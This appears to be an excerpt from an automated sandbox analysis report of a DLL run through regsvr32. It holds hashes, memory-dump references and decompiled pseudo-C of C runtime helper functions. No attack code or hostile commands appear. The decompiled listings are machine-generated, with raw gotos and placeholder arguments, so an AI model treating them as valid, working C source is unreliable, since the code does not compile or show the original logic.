                                                                                        • Instruction ID: 6b038216fd5801b421c61b74e1935d340daef546a177eff3ea16a7a1b838ed42
                                                                                        • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                                        • Instruction Fuzzy Hash: EE112831A08A86D5E7F08B24EC547BE62D0F388355FA0862581DD826E5CF7ED184CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                                                        • API String ID: 2123368286-3532421942
                                                                                        • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                        • Instruction ID: a908f33eec800d0b641dcce84a446a4f1bc570cb1104d1739574f535c1af449d
                                                                                        • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                        • Instruction Fuzzy Hash: 2D115771A2D6468AE7949B54E948B6E73E0F380344F605125F6DD43AA8C7BED508CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                        • API String ID: 2123368286-152112980
                                                                                        • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                        • Instruction ID: 92758ea50bb160a3fa02acdedbd4276cd578df270f1ec03c6948689f63d256e2
                                                                                        • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                        • Instruction Fuzzy Hash: B7110331A1CA83C9F7A09B54EC047AEB6E0F340345F604425D6C8466A4CBBEE8888B02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                                                        • API String ID: 433497747-929597301
                                                                                        • Opcode ID: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                                                        • Instruction ID: a509fa70e7a1a5ff7154c4a485401b757d9bccf253ee3a6eb315a1ba73516cba
                                                                                        • Opcode Fuzzy Hash: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                                                        • Instruction Fuzzy Hash: 25012D21A2C64282F3D09B65EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018A01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                        • API String ID: 2123368286-3131718208
                                                                                        • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                        • Instruction ID: 5c692777b4ebe1842fa8b4633668c7a74dcbf255a9000a4830a35d89f8dfec26
                                                                                        • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                        • Instruction Fuzzy Hash: 64113571E086469AF7A08B28ED047BE62E0F344708F608225A7EC076F5D77EE548CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                        • API String ID: 2123368286-1927795013
                                                                                        • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                        • Instruction ID: 0384ac4a385dd8b2ed67f657b87bd2987707cc06f4fd1891b24df9f5e25f1ad6
                                                                                        • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                        • Instruction Fuzzy Hash: D7010832E0C646D6F7A08B68EC057AD66D0B380354F704225A69C066F9DB7EE585CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                                                        • API String ID: 2123368286-563024394
                                                                                        • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                        • Instruction ID: fd38c362069ef75f6546e890191a2209ff1da2573c153e25103ddfba7490d183
                                                                                        • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                        • Instruction Fuzzy Hash: EA011A3190964A86EBA09F14EC417AE32E0F355328FA14226D29C466E4DB7FE545CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                                                        • API String ID: 2123368286-577066449
                                                                                        • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                        • Instruction ID: 02d1b78a9e545c30370c255a3c9a69dd209a03738a12318584891449022be9b6
                                                                                        • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                        • Instruction Fuzzy Hash: 8F017831E0C64ACAF7E08B54EC847AD26E0F794394FB09535A6DD466F8CB7EE5448B01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 1646373207-1276376045
                                                                                        • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                        • Instruction ID: 7d77de13c6c7ff31230b68e177806ee2c45e09dad43843c6dfa61805c8a48305
                                                                                        • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                        • Instruction Fuzzy Hash: 97F0AC32918A4282D674DB18F94836DB7F0F388348F644125D6CE42678DF3ED559CA04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 41%
                                                                                        			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                                                                        				signed long long _v16;
                                                                                        				long _v24;
                                                                                        				void* _t57;
                                                                                        				signed long long _t59;
                                                                                        
                                                                                        				_t57 = __rax;
                                                                                        				_a8 = __ecx;
                                                                                        				E000007FE7FEF9D3F900(_a8);
                                                                                        				if (_t57 == 0xffffffff) goto 0xf9d40d05;
                                                                                        				if (_a8 != 1) goto 0xf9d40cb3;
                                                                                        				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
                                                                                        				if (_a8 != 2) goto 0xf9d40cef;
                                                                                        				_t59 =  *0xf9d4e560;
                                                                                        				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
                                                                                        				E000007FE7FEF9D3F900(1);
                                                                                        				_v16 = _t59;
                                                                                        				E000007FE7FEF9D3F900(2);
                                                                                        				if (_v16 == _t59) goto 0xf9d40d05;
                                                                                        				E000007FE7FEF9D3F900(_a8);
                                                                                        				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
                                                                                        				_v24 = 0;
                                                                                        				goto 0xf9d40d19;
                                                                                        				_v24 = GetLastError();
                                                                                        				E000007FE7FEF9D3F7D0(_a8, _t59);
                                                                                        				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                                                                        				if (_v24 == 0) goto 0xf9d40d60;
                                                                                        				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
                                                                                        				goto 0xf9d40d62;
                                                                                        				return 0;
                                                                                        			}







                                                                                        0x7fef9d40c80
                                                                                        0x7fef9d40c80
                                                                                        0x7fef9d40c8c
                                                                                        0x7fef9d40c95
                                                                                        0x7fef9d40c9c
                                                                                        0x7fef9d40cb1
                                                                                        0x7fef9d40cb8
                                                                                        0x7fef9d40cba
                                                                                        0x7fef9d40cca
                                                                                        0x7fef9d40cd1
                                                                                        0x7fef9d40cd6
                                                                                        0x7fef9d40ce0
                                                                                        0x7fef9d40ced
                                                                                        0x7fef9d40cf3
                                                                                        0x7fef9d40d03
                                                                                        0x7fef9d40d05
                                                                                        0x7fef9d40d0d
                                                                                        0x7fef9d40d15
                                                                                        0x7fef9d40d1d
                                                                                        0x7fef9d40d44
                                                                                        0x7fef9d40d4e
                                                                                        0x7fef9d40d54
                                                                                        0x7fef9d40d5e
                                                                                        0x7fef9d40d66

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                                                        • String ID:
                                                                                        • API String ID: 1551955814-0
                                                                                        • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                        • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                                                                        • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                        • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatLocaleThread$DateTime
                                                                                        • String ID:
                                                                                        • API String ID: 3587784874-0
                                                                                        • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                        • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                                                                        • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                        • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 23%
                                                                                        			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
                                                                                        				signed int _v24;
                                                                                        				char _v42;
                                                                                        				void* _v48;
                                                                                        				signed int _v56;
                                                                                        				char _v312;
                                                                                        				signed char* _v328;
                                                                                        				char _v584;
                                                                                        				char _v840;
                                                                                        				char _v1352;
                                                                                        				char _v1384;
                                                                                        				char _v1392;
                                                                                        				intOrPtr _v1400;
                                                                                        				long long _v1408;
                                                                                        				long long _v1416;
                                                                                        				signed long long _t206;
                                                                                        				signed char* _t214;
                                                                                        				signed long long _t223;
                                                                                        				intOrPtr _t225;
                                                                                        				intOrPtr _t226;
                                                                                        				signed long long _t233;
                                                                                        
                                                                                        				_t224 = __rcx;
                                                                                        				_a8 = __rcx;
                                                                                        				_t206 =  *0xf9d4b018; // 0x6ebcb970bf84
                                                                                        				_v24 = _t206 ^ _t233;
                                                                                        				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
                                                                                        				_v56 = 0;
                                                                                        				goto 0xf9d2a63c;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
                                                                                        				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                                                                        				goto 0xf9d2a62c;
                                                                                        				_v312 = 0x20;
                                                                                        				_v328 =  &_v42;
                                                                                        				goto 0xf9d2a68f;
                                                                                        				_v328 =  &(_v328[2]);
                                                                                        				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
                                                                                        				_v56 =  *_v328 & 0x000000ff;
                                                                                        				goto 0xf9d2a6c2;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				_t214 = _v328;
                                                                                        				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
                                                                                        				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                                                                        				goto 0xf9d2a6b2;
                                                                                        				goto 0xf9d2a67b;
                                                                                        				_v1392 = 0;
                                                                                        				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                                                                        				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                                                                        				_v1416 =  &_v1352;
                                                                                        				r9d = 0x100;
                                                                                        				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
                                                                                        				_v1384 = 0;
                                                                                        				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                                        				_v1400 = 0x100;
                                                                                        				_v1408 =  &_v840;
                                                                                        				_v1416 = 0x100;
                                                                                        				r8d = 0x100;
                                                                                        				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                                                                        				_v1384 = 0;
                                                                                        				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                                        				_v1400 = 0x100;
                                                                                        				_v1408 =  &_v584;
                                                                                        				_v1416 = 0x100;
                                                                                        				r8d = 0x200;
                                                                                        				_t223 = _a8;
                                                                                        				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                                                                        				_v56 = 0;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
                                                                                        				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
                                                                                        				_t225 = _a8;
                                                                                        				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                                                                        				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                                                                        				goto 0xf9d2a8fc;
                                                                                        				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
                                                                                        				_t226 = _a8;
                                                                                        				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                                                                        				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                                                                        				goto 0xf9d2a8fc;
                                                                                        				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                                                                        				goto L1;
                                                                                        				goto 0xf9d2aa20;
                                                                                        				_v56 = 0;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
                                                                                        				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
                                                                                        				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				__rcx = _a8;
                                                                                        				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				__rdx = _a8;
                                                                                        				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                                        				_v56 = _v56 + 0x20;
                                                                                        				__ecx = _v56;
                                                                                        				__rdx = _a8;
                                                                                        				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                                                                        				goto 0xf9d2aa1b;
                                                                                        				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
                                                                                        				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				__rcx = _a8;
                                                                                        				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                                                                        				_v56 = _v56 + 1;
                                                                                        				__rdx = _a8;
                                                                                        				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                                        				_v56 = _v56 - 0x20;
                                                                                        				__ecx = _v56;
                                                                                        				__rdx = _a8;
                                                                                        				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                                                                        				goto 0xf9d2aa1b;
                                                                                        				__eax = _v56;
                                                                                        				__rcx = _a8;
                                                                                        				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                                                                        				goto L2;
                                                                                        				__rcx = _v24;
                                                                                        				__rcx = _v24 ^ __rsp;
                                                                                        				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                                                        			}























                                                                                        0x7fef9d2a5e0
                                                                                        0x7fef9d2a5e0
                                                                                        0x7fef9d2a5ec
                                                                                        0x7fef9d2a5f6
                                                                                        0x7fef9d2a619
                                                                                        0x7fef9d2a61f
                                                                                        0x7fef9d2a62a
                                                                                        0x7fef9d2a635
                                                                                        0x7fef9d2a647
                                                                                        0x7fef9d2a658
                                                                                        0x7fef9d2a65f
                                                                                        0x7fef9d2a661
                                                                                        0x7fef9d2a671
                                                                                        0x7fef9d2a679
                                                                                        0x7fef9d2a687
                                                                                        0x7fef9d2a69c
                                                                                        0x7fef9d2a6a9
                                                                                        0x7fef9d2a6b0
                                                                                        0x7fef9d2a6bb
                                                                                        0x7fef9d2a6c2
                                                                                        0x7fef9d2a6d5
                                                                                        0x7fef9d2a6de
                                                                                        0x7fef9d2a6e6
                                                                                        0x7fef9d2a6e8
                                                                                        0x7fef9d2a6ea
                                                                                        0x7fef9d2a6fd
                                                                                        0x7fef9d2a70c
                                                                                        0x7fef9d2a715
                                                                                        0x7fef9d2a71a
                                                                                        0x7fef9d2a72f
                                                                                        0x7fef9d2a734
                                                                                        0x7fef9d2a747
                                                                                        0x7fef9d2a74b
                                                                                        0x7fef9d2a75b
                                                                                        0x7fef9d2a760
                                                                                        0x7fef9d2a770
                                                                                        0x7fef9d2a783
                                                                                        0x7fef9d2a788
                                                                                        0x7fef9d2a79b
                                                                                        0x7fef9d2a79f
                                                                                        0x7fef9d2a7af
                                                                                        0x7fef9d2a7b4
                                                                                        0x7fef9d2a7c4
                                                                                        0x7fef9d2a7ca
                                                                                        0x7fef9d2a7d7
                                                                                        0x7fef9d2a7dc
                                                                                        0x7fef9d2a7f2
                                                                                        0x7fef9d2a804
                                                                                        0x7fef9d2a81b
                                                                                        0x7fef9d2a828
                                                                                        0x7fef9d2a84b
                                                                                        0x7fef9d2a86d
                                                                                        0x7fef9d2a874
                                                                                        0x7fef9d2a88a
                                                                                        0x7fef9d2a897
                                                                                        0x7fef9d2a8ba
                                                                                        0x7fef9d2a8dc
                                                                                        0x7fef9d2a8e3
                                                                                        0x7fef9d2a8f4
                                                                                        0x7fef9d2a8fc
                                                                                        0x7fef9d2a901
                                                                                        0x7fef9d2a906
                                                                                        0x7fef9d2a91a
                                                                                        0x7fef9d2a91c
                                                                                        0x7fef9d2a92e
                                                                                        0x7fef9d2a93c
                                                                                        0x7fef9d2a946
                                                                                        0x7fef9d2a94f
                                                                                        0x7fef9d2a953
                                                                                        0x7fef9d2a960
                                                                                        0x7fef9d2a96a
                                                                                        0x7fef9d2a96e
                                                                                        0x7fef9d2a976
                                                                                        0x7fef9d2a981
                                                                                        0x7fef9d2a984
                                                                                        0x7fef9d2a98b
                                                                                        0x7fef9d2a993
                                                                                        0x7fef9d2a99a
                                                                                        0x7fef9d2a9a4
                                                                                        0x7fef9d2a9ae
                                                                                        0x7fef9d2a9b7
                                                                                        0x7fef9d2a9bb
                                                                                        0x7fef9d2a9c8
                                                                                        0x7fef9d2a9d2
                                                                                        0x7fef9d2a9d6
                                                                                        0x7fef9d2a9de
                                                                                        0x7fef9d2a9e9
                                                                                        0x7fef9d2a9ec
                                                                                        0x7fef9d2a9f3
                                                                                        0x7fef9d2a9fb
                                                                                        0x7fef9d2aa02
                                                                                        0x7fef9d2aa04
                                                                                        0x7fef9d2aa0b
                                                                                        0x7fef9d2aa13
                                                                                        0x7fef9d2aa1b
                                                                                        0x7fef9d2aa20
                                                                                        0x7fef9d2aa28
                                                                                        0x7fef9d2aa37

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Info
                                                                                        • String ID: $z
                                                                                        • API String ID: 1807457897-2251613814
